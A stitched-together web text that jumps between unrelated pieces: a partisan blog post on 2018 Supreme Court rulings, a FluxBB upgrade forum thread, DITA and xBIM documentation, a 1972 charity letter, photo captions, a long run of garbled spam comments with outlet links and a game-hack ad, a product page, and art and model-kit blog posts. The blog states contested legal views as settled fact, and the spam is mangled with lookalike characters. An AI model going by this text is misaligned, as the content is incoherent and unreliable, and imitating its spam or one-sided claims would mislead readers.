In Article I, Section 9 of the U.S. Constitution the Congress is authorized to make laws prohibiting persons coming into the United States for any reason they feel is necessary. President Trump, when it came to his executive order that became known as the "Muslim travel ban" by liberal left circles, was actually in line with constitutional authority. President Trump was, according to the Trump team in the case in question, "Invoking his authority under 8 U. S. C. §§1182(f) and 1185(a), he determined that certain restrictions were necessary to 'prevent the entry of those foreign nationals about whom the United States Government lacks sufficient information' and 'elicit improved identity-management and information-sharing protocols and practices from foreign governments.' The Proclamation imposes a range of entry restrictions that vary based on the 'distinct circumstances' in each of the eight countries. It exempts lawful permanent residents and provides case-by-case waivers under certain circumstances. It also directs DHS to assess on a continuing basis whether the restrictions should be modified or continued, and to report to the President every 180 days. At the completion of the first such review period, the President determined that Chad had sufficiently improved its practices, and he accordingly lifted restrictions on its nationals."
The Supreme Court ruled to uphold President Trump's travel restrictions executive order, a ruling that may also carry with it sweeping implications regarding immigration and refugee laws, and how the President executes those laws through executive orders, and through agencies who operate under the executive branch of government.
The 5-4 ruling reversed a series of lower court decisions that struck down the ban as illegal or unconstitutional.
"In this era of worldwide terrorism and extremist movements bent on harming innocent civilians, we must properly vet those coming into our country," the president said. "This ruling is also a moment of profound vindication following months of hysterical commentary from the media and Democratic politicians who refuse to do what it takes to secure our border and our country."
According to anti-Trump Democrats the president vowed to ban Muslims during the 2016 presidential campaign and made similar statements on Twitter after his election. The high court said those statements did not constitute evidence of religious discrimination.
Chief Justice John Roberts issued the opinion, explaining the ban's restrictions are limited to countries designated by Congress or prior administrations as posing national security risks. He noted that Trump's latest version followed a worldwide review process by several government agencies.
"The proclamation is squarely within the scope of presidential authority," the chief justice said. Claims of religious bias against Muslims do not hold up, he said, against "a sufficient national security justification."
Attorney General Jeff Sessions hailed the court decision as "critical to ensuring the continued authority of President Trump — and all future presidents — to protect the American people."
In a concurring opinion, Justice Clarence Thomas went further than Roberts and said the court should consider declaring that district courts cannot block actions such as the travel ban on a nationwide basis. Sessions asked the high court to strike down such a nationwide injunction against the administration's effort to withhold funds from "sanctuary cities" that oppose federal immigration policies.
The liberal left stands by their claim that the travel ban executive order is based upon religious discrimination, and unfairly targets Islam. Justice Sotomayor claimed the Supreme Court's decision is a double-standard that "masquerades behind a facade of national-security concerns" and inflicts "pain and suffering ... upon countless families and individuals, many of whom are United States citizens."
She noted that the court ruled this month in favor of a Colorado baker who refused to serve a same-sex wedding because government officials were hostile to his religious objections.
"In both instances, the question is whether a government actor exhibited tolerance and neutrality in reaching a decision that affects individuals’ fundamental religious freedom," Sotomayor said.
The lower courts that deemed the executive orders "unconstitutional" used religious discrimination as an excuse for their rulings, explaining that it was not so much the ban as much as it was about the purpose behind President Trump's actions. They claimed they knew the reason behind the "travel ban" because Trump's words as a candidate for President of the United States revealed his purpose, that he was specifically targeting and banning Muslims based on those words, and his initial focus was on six majority-Muslim nations which allegedly confirms his discriminatory reasoning.
Judges and legal analysts who defended the travel restrictions executive orders argued that Trump's words cannot form the basis for a constitutional violation. It takes too much interpretation, they said, to read anti-Muslim bias into an executive order or proclamation that, on its surface, is devoid of religious content.
From a constitutional view, it doesn't matter if the executive orders target Muslims, or not. The only place in the U.S. Constitution that addresses "religious tests" is in Article VI., where the law of the land disallows religious tests in regards to holding government or political office in the United States.
As for the lower courts striking down the executive orders, Justice Clarence Thomas was correct in addressing that issue, for there is no authority listed in the U.S. Constitution allowing the courts to strike down executive orders. The court system was not designed to be a check against the President. That duty belongs to Congress, the States, and We the People.
Nonetheless, the executive orders were not written in a manner that reveals any kind of religious discrimination, and based on the language they were written to protect the United States from refugees or migrants who may pose as a national security risk to the country based on their connection to terrorism or anti-American radical belief systems as deduced from their individual histories and the political environment from which they are coming.
Article II gives the President the authority to execute the laws of the country, and 8 U. S. C. §§1182(f) and 1185(a), of which the executive orders were written to execute, are existing laws on the books. Based upon that data, alone, the executive orders by President Trump that executes those laws by placing travel restrictions upon persons travelling from certain countries, are constitutional.
○ Rowan County v. Lund - The Supreme Court chose not to hear this case. By not taking the case, it allows the lower federal court ruling to stand.
The U.S. Supreme Court should have taken this case, not to give a ruling, but to strike down all rulings on this case at the federal level so that the case may be settled at the State level. While the plaintiffs claim this case falls into federal jurisdiction because it is in regards to the establishment clause in the First Amendment, this assertion is actually wrong.
The First Amendment states that "Congress shall make no law respecting an establishment of religion, or prohibiting the free exercise thereof." At the time of the ratification of this amendment, eleven States had "established religions," but none of them changed that policy immediately after the ratification of the First Amendment because it did not affect them. Religion is a State issue, and the federal government has no authority over the issue.
For those who fear that the position I just presented opens the door for theocracies to rise up at the State level, the Framers of the Constitution recognized that a theocracy was not an acceptable form of government in these United States, and that is why in Article IV, Section 4 of the U.S. Constitution it also states that, "The United States shall guarantee to every State in this Union a Republican Form of Government."
In the Rowan County prayer case, the argument stemmed from a local county board that prayed before each session, and three residents who claimed that doing so was in violation of the establishment clause.
Based on the language of the Constitution itself, county commissioners praying before a county board meeting with members of the public present is not a case of "Congress making law." Besides, even if the claim of separation of church and state claimed by the progressive liberal left was a valid argument, at no time did the commissioners of Rowan County, North Carolina, coerce members of the public to join in those prayers, demand that the prayers must be Christian (even though a majority of the time they were), or demand that you had to be a Christian to attend the meetings or hold office in the county.
I wonder if the county commission was all Muslim, and they were praying Muslim prayers before the meeting, if the same plaintiffs would have brought the same case before the courts.
In July 2017, the Fourth Circuit of the US Court of Appeals erroneously ruled that Rowan County's practice of prayer before county commission meetings is unconstitutional.
Justice Clarence Thomas and Justice Neil Gorsuch voiced strong dissent about the Supreme Court’s decision to not to take the case regarding legislative prayer.
A May 2015 federal district court ruling not only considered the prayers by the county commissioners unconstitutional, but the court ordered the commissioners to cease the practice of opening meetings with "coercive" prayer.
○ HUSTED, OHIO SECRETARY OF STATE v. A. PHILIPRANDOLPH INSTITUTE ET AL. - Each election accusations of voter fraud rise up. In an effort to combat electoral irregularities, many groups have been calling for the updating of voter rolls, which would include, but not be limited to, the removal of persons from the rolls who are deceased, no longer residents of the State, or do not fit the requirements to be a voter in the United States. In Ohio, these efforts to purge its voting rolls have been aggressive, and the Supreme Court upheld their efforts by a 5-4 decision.
The court ruled that States may remove people from the rolls if they skip a number of elections and fail to respond to a notice from election officials.
In Ohio, after skipping a single federal election cycle, voters are sent a notice. If they fail to respond and do not vote in the next four years, their names are purged from the rolls.
While in Article I the manner and procedures of elections are a State authority, Congress may also make laws necessary in relation to elections. Justice Alito, in his opinion, pointed out that federal law “plainly reflects Congress’s judgment that the failure to send back the card, coupled with the failure to vote during the period covering the next two general federal elections, is significant evidence that the addressee has moved,” and therefore, is sufficient reason to remove the person from the roles. It is a voter's responsibility to ensure they are listed on the roles.
The liberal justices in their dissent claimed the purging of voter rolls, like Voter ID, is an attempt to suppress the vote of minorities.
Justice Alito, addressing the concerns of the liberal justices, wrote, “The dissents have a policy disagreement, not just with Ohio, but with Congress. But this case presents a question of statutory interpretation, not a question of policy. We have no authority to second-guess Congress or to decide whether” Ohio’s notification program “is the ideal method for keeping its voting rolls up to date.”
“The only question before us is whether it violates federal law,” Justice Alito wrote. “It does not.”
The ruling "does give all 50 states the green light to do what Ohio did," said Edward B. Foley, an election-law scholar at Ohio State University’s Moritz College of Law. “But I think that green light is very specific with respect to voter purging and list maintenance.”
If the next case is regarding Voter ID, and the Supreme Court rules in support of that one, as well, it may serve as an incredible setback for those who have been fomenting and protecting voter fraud.
Douglas V. Gibbs is a proud member of the Military Writers Society of America. Click the image below to go to the MWSA website.
Palmer Luckey thought criminal aka Trump Supporter fired by Facebook for opposing Hillary aka Big Brother, Donated $10,000 to an anti Hillary Clinton group
~FAIR USE~ Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use.
This site may contain copyrighted material the use of which has not always been specifically authorized by the copyright owner. I am making such material available in my efforts to advance understanding of political, human rights, economic, democracy, and social justice issues, etc. I believe this constitutes a 'fair use' of any such copyrighted material as provided for in section 107 of the US Copyright Law. In accordance with Title 17 U.S.C. Section 107, the material on this site is distributed without profit to those who have expressed a prior interest in receiving the included information for research, educational, or satirical purposes. If you wish to use copyrighted material from this site/blog for purposes of your own that go beyond 'fair use', you must obtain permission from the copyright owner.
However, if you still believe your copyright has been violated, we accept notifications of alleged copyright violations in accordance with the Digital Millennium Copyright Act. Note that if you materially misrepresent a claim of copyright infringement you will be liable for damages (including costs
and attorney fees). We require the following information in order to respond to your request: Describe in detail the copyrighted work that you believe has been infringed upon (for example, “The copyrighted work is the code that appears
on http://www.example.com/thecode.html") Identify the material that you claim is infringing the copyrighted work listed in #1. Include relevant URL’s that will allow us to identify the work. Your address, telephone number,
and email address. Include the following statement “I have a good faith belief that use of the copyrighted materials described above as allegedly infringing is not authorized by the copyright owner, its agent, or the law.” Include the
following statement “I swear, under penalty of perjury, that the information in the notification is accurate and that I am the copyright owner or am authorized to act on behalf of the owner of an exclusive right that is allegedly infringed.” Sign the notification, type your full name, sign it electronically
You can also Email me to bitch and complain if you so desire, as well. In the event that you are offended by my site please advise me of the offensive material by Email, and I will promptly print the Email, and then place it in my shredder to serve as kindling for my fireplace.
Following the link also gives you the line number the code is on: 58. It's by no means rocket science.
I'm not a native English Man. So my comments might contain some grammatical explosive (ELD), missapropreation of words (dinamyt), The use of wrong words (missiles), & mis spelling of words (war drones). Any of the occurrence can cause havoc. So be warned
Trying to upgrade from v1.5.6 to v1.5.7 - have run the update_db.php and the screen goes to white and seems to not do anything more. Trying to access the forum after that and just get the simple "Sorry, we are currently doing maintenance, please come back later."
Been like that for a few hours now so I don't think it's actually running any updater. What can I do to manually get the database up to v1.5.7 and get rid of the maintenance message and the forum working again?
A white screen is a sign of a fatal PHP error. Please enable full error reporting and check your error logs.
Surely nothing major has changed in the database structure between v1.5.6 and v.1.5.7 - can't I simply remote connect to the database and make any minor adjustments there? Just need to know what's changed.
It's mainly just VARCHAR stuff that I've seen - but that is only what I've seen which was a very brief look, I haven't really looked at the code in any depth but I suggest you try your best to avoid manually editing it in phpMyAdmin, it will only over complicate stuff - it's a fairly big file. Not only that but it re-defines constants and updates some config - then regenerates all the cache.
If you add the following at the top of the file just after the <?php you'll be able to see any errors in the script, some of which are hidden by FluxBB by default:
So I just manually edited the entry in config table of database to the new version number and I'm back up and running with the latest version installed. Cheers anyway.
I would expect to see the latest commit being somewhere in October, being the security fix. Do I miss something here? You may have guessed correctly by now that I'm not Github savvy...
Edit: I read elsewhere that master should already be 1.5.7. But anyway I thought it was strange that the 1.5.7 tag would result in the 1.5.6 code.
I think that's because I re-applied an old commit from another branch. See this list which contains all the commits that made it into v1.5.7.
This allows us to quickly make a release based on master with just the security fixes. Makes applying them easier for you guys.
The <cmd> element specifies a command, which is a required element inside the <step> element. It provides the active voice instruction to the user for completing the step, and should not be more than one sentence. If the step needs additional explanation, place the explanation in an <info> element following the <cmd>.
Note: These models represent only the default document types distributed by OASIS. Actual content models will differ with each new document type.
univ-atts attribute group (includes select-atts, id-atts, and localization-atts groups) A set of related attributes, described in univ-atts attribute group
xBIM allows .NET developers to read, create and view Building Information (BIM) Models in the IFC format. There is full support for geometric, topological operations and visualisation. In addition xBIM supports bi-directional translation between IFC and COBie formats. Core libraries for data manipulation are all written in C#, core of geometry engine is written in C++.
Our main distribution channel is NuGet. Versions published there are assumed to be stable and safe. You can also use our development feeds as listed at the bottom of this page. Have a look at this quick guide to get up to speed with basic xBIM functions. Examples contain other code samples and snippets which present various xBIM features. You will see that it is quite powerful.
Two core libraries xBIM Essentials and xBIM Geometry are to be used for the creation of complex applications, other repositories under the xBIM Team page include a number of example applications to demonstrate its capabilities:
xBIM Xplorer - a Windows WPF sample application that can open and render 3D IFC models (and native xBIM models ) as well as displaying semantic data.
xBIM Exchange - Project containing libraries and sample application demonstrating various approaches to work with COBie. This includes Xbim.Cobie which represents spreadsheet view of the COBie model, implementation of CobieLite, Xbim.CobieLiteUK which is XML model inspired by CobieLite but more rigorous and memory efficient and CobieExpress as an EXPRESS based model representing COBie. XbimExchange contains sample code for conversions between IFC and various implementations of COBie.
xBIM Samples - a sample console application demonstrating how to undertake simple IFC creation and other tasks with xBIM.
Please note: all the applications except for xBIM WebUI are provided to demonstrate how to use the xBIM library, they are not intended for use in uncontrolled production environments.
The XBIM library is made available under the CDDL Open Source licence. List of third party licenses is here.
All licences should support the commercial usage of the xBIM Toolkit within a 'Larger Work', as long as you honour the licence agreements.
The toolkit uses the NuGet technology for the management of several required packages as well as for distributing the libraries. If you wish to use the development versions of xBIM make sure to add our NuGet feeds for the master and develop branches of the solution. NuGet can download all the required dependencies for you if you have the correct package source configuration.
I would like to invite you to serve on the newly reorganized Combined Jewish Philanthropies Committee
Transcript COMBINED JEWISH PHILANTHROPIES Hon Matthew Drown caccutivc vice riceroEnt EXECUTIVE DIACCTOS Dear I would like to invite you to serve on the newly reorganized Combined Jewish Philanthropies Committee on Social Welfare which will be under the chairmanship of This committee has in the past dealt with issues such as the reorganization of the Massachusetts Public Welfare Department, Civil Service reforms, the Medicare and Medic aid systems, and the support of a guaranteed annual income under the Family Assistance Plan. The relationship of CJP agencies to Government services, and the position CJP should take on social welfare legislation on local, stale, and federal levels are the responsibility of this committee. The initial meeting of this committee will be held on: Thursday, May 18th, 1972 12:15 P.M. - CJP Offices Luncheon will be served. Please let me know on the enclosed postcard whether you will be able to attend. Sincerely, Matthew Brown
Georgia State Senator Beverly Langford, speaking during the Georgia Senate's debate on ratification of the Equal Rights Amendment, Atlanta, Georgia, January 21, 1980. :: Atlanta Journal-Constitution Photographs
Home Atlanta Journal-Constitution Photographs Georgia State Senator Beverly Langford, speaking during the Georgia Senate's debate on...
Georgia State Senator Beverly Langford, speaking during the Georgia Senate's debate on ratification of the Equal Rights Amendment, Atlanta, Georgia, January 21, 1980.
Title Georgia State Senator Beverly Langford, speaking during the Georgia Senate's debate on ratification of the Equal Rights Amendment, Atlanta, Georgia, January 21, 1980.
Georgia State University versus University of Alabama at Birmingham in men's basketball, Atlanta, Georgia, February 2, 1981. :: Atlanta Journal-Constitution Photographs
Home Atlanta Journal-Constitution Photographs Georgia State University versus University of Alabama at Birmingham in men's basketball, Atlanta,...
Georgia State University versus University of Alabama at Birmingham in men's basketball, Atlanta, Georgia, February 2, 1981.
Title Georgia State University versus University of Alabama at Birmingham in men's basketball, Atlanta, Georgia, February 2, 1981.
Description No assinment sheet in the negative envelope. The Georgia State Panthers played two games against the UAB team that season, and lost both. Envelope is inscribed: "GA State v.s Birmingham Basketball. Andy Sharp."
All the armamentarium of recent capital markets boils right down to investing inside a new generation so they provides for all of us when we are old not Fake in order to prevent this from happening, the borrower will must know very well what secured finance are and the types accessible to them.
I got this web page from my pal who told me regarding this website and at the moment this time I am visiting this website and reading very informative articles here.
I Ԁo agree աith all the ideas үou've offered on your post. Theү arе vеry convincing and cаn certainly work. Տtill, thе posts are tοo quick for newbies. Ӎay just yoս рlease lengthen tҺem a littlе frߋm subsequent time? Ƭhank you for the post.
It's the best time to make some plans for the future and it's time to be happy. I've read this post and if I could I wish to suggest you few interesting things or suggestions. Perhaps you could write next articles referring to this article. I desire to read even more things about it!
Its like you read my mind! You seem to know so much about this, like you wrote the book in it or something. I think that you could do with some pics to drive the message home a bit, but instead of that, this is excellent blog. An excellent read. I will certainly be back.
Cοach Factory Ѕtore "The one who sells should go and purchase, then they really need to buy to replace, so no club secure.Until the late, a club may go there and 'steal' a farmer. http://www.bwba.org/?tags=Coach+Shoes+For+Cheap First Lady Michelle Obama stands tall and regal in the official portrait, a double strand of creamy pearls around her neck, her figure clad inside of a fitted Michael Kors dress.But Lindsay Lohan, Paris Hilton and Nicole Richie aren vital to me.
coach pսrse Relair EЅPN received future scheduling consiԁerations from CВS to ƿroduce the moѵe.Talked a small amount about focus in the future, Oates said. http://cnkmmobile.com/shop/?keywords=Coach+Online
http://caffeebiz.info/shop/?tags=Coach+factory+codes Ԝhenever the stagе can be below 80 anɗ you are obviouwly living with conditions which includes rumbeling, swat or maybe hassle imagining, you should boost the multitude quickly. http://caffeebiz.info/shop/?tags=Coach+Bonney+High+Top+Sneakers
I visited multiple sites however the audio feature for audio songs existing at this website is really wonderful.
http://www.bastia1905.com/sac-new-coach.html The most recent dеvеlopment in press announcements retail set up iѕ that of a Facеbook shop.Impoгtant upn BBC The usa. Wholesale Mlb Jerѕeys Haνing said thаt, it wаs subѕequently the comments percentag of poѕt which actually grabbed me.8 crews (more effective, excluding thhe coߋrdinator party) plaƴ for 3 medals: oldԁ watches, gold, and additioոally bгonze.
http://www.fwewrestling.com/shopping/?search=Www.Coach+Factory+Outlet+Online.Com Hiցhs on Halloween will requіre us intο the low 60s! The not really much amazing рart is usually that we will be dodging some scattered showers tonight through late tomorrow wҺich has an increased probability of someе more durable rain and alsο storms tomorгow night into at the least the first half of Halloween.The Huskies ɑrе ranked sinjce the No. Coacxh watch
Ϲoach factory socks outlet online mеոs bright (Rіco) BuilԀ outt of the Jamba branded consumer products group."I felt such regret she never had reached do sokme things she really wanted to do," Dutra says. http://www.bwba.org/?keywords=Coach+outlet+diaper+bag+black
Cοach Sɑle Outlet To makе sure uρright dowels perservere.Dеcorate thhe outdoors edges of tthe jumps, as well as grоund beside them, wit miniature fake plants, available where dߋll-house accessorties aгe available. You have ample ideas if you look ɑt real high level jump courses after which it visit a hobby store doll-house section.Fuгthermore, ɗon throw your toy horses during the jumрs.Anothеr friend experienced a tequila encounter in a Nogaqles restaurant: "The owner started coming around with a bottle and pouring free shots. http://stateofbeing.org/brand/?search=Coach+Premium+Outlet+Aurora+Il
Http://Stateofbeing.Org/Brand/?Search=Coach+Purses+Outlet+Store+Locations Bʏ doing this, non divisionl competitioո will рrobably be mostly among common opponents the exception is the ttwo games assignmed according to the teɑm's prior season ɗivisіonal standinǥ."Goatsae Security obtained its data by using a script on AT website, for sale to anyone via the internet. When provided with an ICCID as an element of an HTTP request, the script would return the associated email address, in what was apparently intended as an AJAXstyle response inside of a Web application. Coach Factory Online Outlet Reviews
Actially no matter if someone doesn't undedrstand then its up to oyher visitors thjat they will assist, so here it takes place.
Coaϲh purses clearance ѕale "But the board shouldn't have to suffer this injury for three months.alart, remaining, rivaling To the south Korea's Choi Gyujin at the time of 55kg GrecoRoman struggling competitors in the The coming year The summer season Olympic games inside london. Coach purse outlet So, at that moment, you're missing lots of relevant information.All things considered, closets are usually not typically manufactured to accommodate just footwear.
http://raulsautomotive.com/brand/?tags=Coach+Shoes+For+Babies еthod home computer, Ensure that yoս the softwaгe did not done.It shouldn't be paгt of a suЬstitute for ρarticcular health advice, A fabulouѕ verdict considering that strategieѕ.http://raulsautomotive.com/brand/?tags=Coach+Factory+Bags After finishing four years at Robert Morrіs University, the NHL lockout managed to make it difficult for гookies ljke Crichton in order to into the pros and turn into there.I often made people restart ǥɑmes even thouǥh I couldn distinuish betweеn the jerseys and would pass the ball to tҺe оρposite teamCarom: Ӏ loved playing ϲarom.
Posted by: http://raulsautomotive.com/brand/?tags=Coach+Shoes+For+Babies | Thursday, May 01, 2014 at 09:11
http://baseballpierrefonds.com/fashion/Is-the-coach-outlet-store-online-a-scam.html Fօr yoս to supplementarƴ well being advantages neeԀed for activity, Illustra.mpeting and I'm respeected thɑt they are portion of it today. Tanger coach Outlet howell This weekend, the vօlleyball team wіll participate in tҺe "Dig Pink" Tournament also.Thee varsity girls maƴ play agaqinst Independence on Tuesday and then both JV and ѵarsity teams will have against Destrehan on Ԝednеsday.
http://www.flourtownswimclub.net/coach-outlet.html In Wieber and also Douglas, amerіca wwas basically starting ɑ narrative strangelʏ akin to China a capability 18 bxing techinque wifh gymոastts at the same time r.ѕ .} use Grapeѕhot in aոy contextual skjіn color medical know-how, Causing us to to get custom-made multiple content pieceѕ terrace outside of many of our typicɑl l. coach outlet store online Loria is aaո awful verѕion off [George] Steinbrеnner.ΕTA: Basically remove my large book I could possibly еasily fit a big differеոce of clotheѕ with room еxcess.
Cheap Jеrseyѕ So, if yyou have a hiknt of fascination within the eyes in the young in yօuг family this is a proԀuct I suggest.But the Konus it not just fоr kids. http://www.denisesawyer.com She together witɦ Suzy happen to be fixed up byy way of a commonplace associate from үour ex father as ell as Spitz's pop, who was simply through the scrɑp steel in addition to light weight aluminum internеt business.His or her potential fatҺerinlaw recognized who seewm to.
http://Mercare.com.vn/cheap/?q=small+coach+bags+for+women Ƭhat churidar is certainly ordinary.And is alρso congratulated considering the kameez whiϲh happens to be conduϲted generally on serious patc. Picture of smal coacϲh bags It's because homeowner associations with under 60 units often can't afford outsіde manaցement professional advice to all o.Well, іt seems that way, аnyhow.
Posted by: http://Mercare.com.vn/cheap/?q=small+coach+bags+for+women | Saturday, July 12, 2014 at 22:47
http://www.artzsource.com/cheap/?tags=Black+coach+purse+2014 10: 1213) Nothing of us secure ɑnnd safe; faqmous or perhaps not!.The thing of AClass іs sent as argument for the method oof the item of Illustrаtion. http://www.artzsource.com/cheap/?tags=Coach+coach+jayme+sneaker+black How music and dance would be a form of idеntity for these particular blɑck woman."My heart agreed, my body said no," he waѕ quoteԁ saying repeatedcly afterԝard, his tiny frame draped ɑcross a tiny stool inside locker room.
Posted by: http://www.artzsource.com/cheap/?tags=Black+coach+purse+2014 | Tuesday, July 15, 2014 at 21:36
CҺeɑp Niҟe Small Backpacks For Men Then you'ѵe to think about Pаm Оlіver, who seem to deb.At present the real estate ѕector that the CPO provides his signature standing on the provideг. Cheap Nike Baby Shoes Ebay Not only can they uѕee softԝare to help them to practice any hobbies they've gߋt, but thhe Inteгnet will also helρ them to keep active іn others whho be associɑted wіth theiг hobby.A lot morе important comρared to the look, though, would bе the fit.
http://baseballpierrefonds.com/fashion/Coach-tanger-outlet-pittsburgh.html A lot of tіmews in those sіtuɑtions, ggսys try and speеd up a ɦuge amount of, theey fіnd yoursel fumbling the catch.Fantasy basketball, like οthеr fantasy sportѕ gamees you can find online, was made to add excitement for the game. Cheap Nhl Jerseys During the opening scenes from a dystօpian YouTube vіdeo ǥone viral, a scarecrow has a job in the biǥ city from a processedfoods factory.In March, pendіng home sales rose on their highest leѵel in sevеral уears.
Posted by: http://baseballpierrefonds.com/fashion/Coach-tanger-outlet-pittsburgh.html | Monday, July 28, 2014 at 11:06
Supercell indicates itself being one of the better executing game developers when you're near the top of App Shop charts. Using our Hay Day Hack 244022 members have generated endless Gemstones, and Coins. Each ride is 5 miles longer lasting for around 1 hour and they can safely take up to 8 people on each ride.
http://www.zugamedical.com/resource/pinterest/?tags=New-year-sales-coach-accessories Ɗonna we were in-tuned on Twitter, andd I expressed affinity for reviewing it, buut she never sent it.Others are developed too be that are part of your ԝall as an electrical outlеt, but rathег than plugging your lamp into them, you'll be able to stash your spare cash in thіs dіversion sɑfe. Coach Handbags After Chгistmas Deal
Universіty Of Note Dame FootЬall Coaches That cloths utilized arre actually speсifieԀ to be really tоugh and even long-lasting.Οn Mrs. Coach Onlіne
Ƅlack Friday coаch deals The simple truth is, the scentѕ we detеct from others սndesiгɑble a measurable relation to how we feel, yet not necеssarily within the erotic fashion.Sρecifically, the one he recently bought, for $500, froom just one of the sponsors օf his Phillybaseԁ ѕyndicated radio ρrogram. micɦwel kors black friday
Muc-Off Eyewear and Goggle Anti-Fog Treatment has an intensive anti-mist formula to keep your goggles and glasses fog free for longer.
Muc-Off Premium Anti-Fog Treatment contains proprietary water absorbing technology and low surface tension carriers to help give you clear vision, even under the toughest competition conditions.
Our advanced formula can be applied quickly and safely to leave a transparent micro-thin anti-fog coating.
"Bike cleaning made easy" is the Muc-Off motto! Every product in their range is developed to be the most advanced of its type and to be as fast and effective to use as possible - cleaning is no longer a complex job! Since 1994 the Muc-Off brand has grown from just one cleaner into the UK's number one bicycle maintenance range. This rapid growth has been fuelled by a massive consumer demand which seems to grow with every clean bike!
Rated 4 out of 5 by cwhys from For those cold damp rides. comes in a small bottle for the price, but still lasts a while. it does keep your glasses from misting for about 1-2 weeks. The water still condenses but not as a mist. For my use, although they are expensive, I do think for my commutte, they are worth it.
Rated 2 out of 5 by bongjun from hum... when i used it my gogle, fog was appeared during riding. so i do not recommend it.
Rated 4 out of 5 by AAJM from Just the job it is simple to use and effective in keeping goggles clear for skiing and on mtb
Rated 4 out of 5 by BristolBob from What it says on the tin, mostly... Bought for use with Kask Bambino as visor fogging in damp conditions. First use was a real baptism of fire with a 100m TT in mild but very wet conditions with near constant rain. Visor stayed clear for 3 hrs before starting to fog at which point it fogged quickly and heavily and I had no way of clearing for the next hr. Everyone who raced that day had same issues no matter what helmet or anti fog products used hence good overall rating. In more normal conditions water & sweat runs off quickly and doesn't leave a trace.
The Zoo has had links with the Sahel for many years, through its very active participation in conservation and reintroduction projects for some of the most endangered species in the region, such as the Mohor and Dorcas gazelles, particularly in Senegal, in partnership with the.
Synopsis: Based on the true story of a bedroom-eyed Kansas preacher who decided that getting rid of his wife, and his secretary's husband, was the will of the Lord.
There’s a great scene in a movie of a famous painter asking his student what colour the clouds are. The student, responding instinctively, says “white.” Seeing the painter’s look of disappointment, the student takes a closer look at the clouds, and then observes several colours.
What makes this scene great is the way it encapsulates a common failing of would-be artists: their lack of discipline in using their senses to perceive the environment. We become so accustomed to relying on instinct and memory to interpret the world around us, that we forget to use our eyes. It seems rational enough to say that clouds are white, but that answer is a knee-jerk response based memories of what clouds look like (perhaps from a Wikipedia photograph), rather than in-the-moment observation.
Many of our daily actions are governed by a kind of perceptual shorthand in which we rely on past knowledge and experience to move through life. We discount the present moment and tune out the environment. This is usually a practical tactic for urban dwellers suffering from sensory overload, but it works against our development as artists.
If we create art by interpreting the world around us, then the first piece in that process is the interpretation part. It is also the most critical part. Get that wrong, and everything that follows will also be wrong.
So how do we turn off our pre-programmed responses, stop being robots, and re-engage our senses? To paraphrase one of the tenets of Buddhism, “live in the moment.” This means paying attention to what you see, hear, taste, touch and smell, right here and right now. Just to qualify this, I’m not suggesting you change religions. But opening yourself to your environment and opening up your sensory capacity to its fullest potential can make you a better artist.
I’ve found that it helps to focus on one sense at a time. There are some simple steps you can take to develop this focus. For example, when eating dinner, don’t listen to music, read, or watch videos at the same time. Concentrate 100% on the taste of the food. You’ll find you enjoy your meal much more, and feel more satisfied at the end. Multitasking is overrated. It’s also at odds with our biology. Our brains are like one-CPU computers, meaning we can only concentrate effectively on one task at a time.
To wrap up, I’ll leave you with this Buddhist parable, which comes right to the point (from dailybuddhist.com):
A man traveling across a field encountered a tiger. He fled, the tiger after him. Coming to a precipice, he caught hold of the root of a wild vine and swung himself down over the edge. The tiger sniffed at him from above. Trembling, the man looked down to where, far below, another tiger was waiting to eat him. Only the vine sustained him. Two mice, one white and one black, little by little started to gnaw away the vine. The man saw a luscious strawberry near him. Grasping the vine with one hand, he plucked the strawberry with the other. How sweet it tasted!
There is usually a clear dividing line between plastic kit manufacturers (like Tamiya) and toy producers (like Hasbro). As far as I know, Tamiya has never produced a toy and Hasbro has never produced a scale model kit.
But some companies make both kits and toys. Bandai, Aoshima and Takara Tomy fall into this category. The quality of kits produced by these firms tends to be less consistent than you’d find with a dedicated kit manufacturer. This isn’t surprising given that their primary target market is children.
It goes without saying that five-year olds have a vastly different set of criteria than adults do when it comes to hobbies. Some five-year olds like to put their prized possessions in the sandbox. Others like to chew on them. I’ve yet to see any adult modellers taking part in either of these activities (if you know an adult fitting this description, please take them to a psychiatrist immediately).
Takara Tomy recently introduced both a large toy of Thunderbird 2 from the new Thunderbirds Are Go TV series, as well as a “Real Kit” of the same subject in 1:144 scale. The former product is aimed squarely at five-year olds. It features opening sections, moving parts, a detachable pod with Thunderbird 4, and built-in sounds. This seems to be a well thought out product which kids should like.
1. The kit is hard to distinguish from the toy. In fact, eBay listings for the two products are so similar that it’s hard to tell one from the other.
2. It is a snap together kit with a choice of stick-on markings or waterslide decals. These features indicate that the product is aimed at novice modellers.
3. Like the toy, the kit features a removable cockpit roof. This creates a huge gap at the bottom of the roof and ruins the scale look of the kit. Authenticity was obviously not a priority in the design of the kit.
Considering these compromises, it’s clear that Takara Tomy rejected the idea of a serious scale replica. Instead, the company attempted to create a product that would appeal to both children and adults. This was a mistake for two reasons.
First, the Real Kit is not sufficiently different from the toy in price or appearance. This may result in the two products cannibalizing each other’s sales.
Second, the Real Kit was designed under the assumption that most Thunderbirds Are Go viewers are kids. This fails to take adult viewers into account, who grew up with the original Thunderbirds series and are now enjoying the new reboot as a trip down memory lane. Many of these returning viewers are experienced modellers willing to pay top dollar for authentic kits of their favourite subjects. They have fond memories of the original Thunderbirds series and still admire all its wonderful hardware.
Takara Tomy would have been much wiser to follow the example of FineMolds, whose Star Wars kits set a new standard in quality for sci-fi subjects. Their enormously successful 1:72 Millennium Falcon which I discussed here is a case in point. The FineMolds Falcon was a rarity: a mass produced, high quality sci-fi kit aimed squarely at experienced modellers, with no compromises made to attract younger modellers.
In addition to compromising the quality of their kits, companies like Takara Tomy, Bandai and Aoshima also do a disservice to modellers by associating kits with toys. This tarnishes the image of scale modelling. Buying a kit from one of these companies is a bit like buying a stereo from a guy with a van parked in an alley.
But at the end of the day, having an average quality kit of the new Thunderbird 2 is better than nothing. Given the relatively low demand for sci-fi kits, we have to take what we can get. So if you decide to pick up Takara Tomy’s new Thunderbird 2, be prepared to do some extra work to get it up to standard. The basic shape of the kit looks accurate enough, and most of its shortcomings can be overcome with a little care. Just make sure to throw out the stickers. Or even better, mail them back to Takara Tomy with a note stating that scale modellers don’t use stickers!
Before the age of computer generated special effects, movie makers used several tricks to make the most of miniature photography. One of these tricks is called forced perspective. This technique exaggerates the apparent depth of a scene by placing large scale objects near the camera and small scale objects farther back. For example, placing a 1:10 scale miniature tree close to the camera and a 1:20 scale tree further back increases the apparent distance between the two trees.
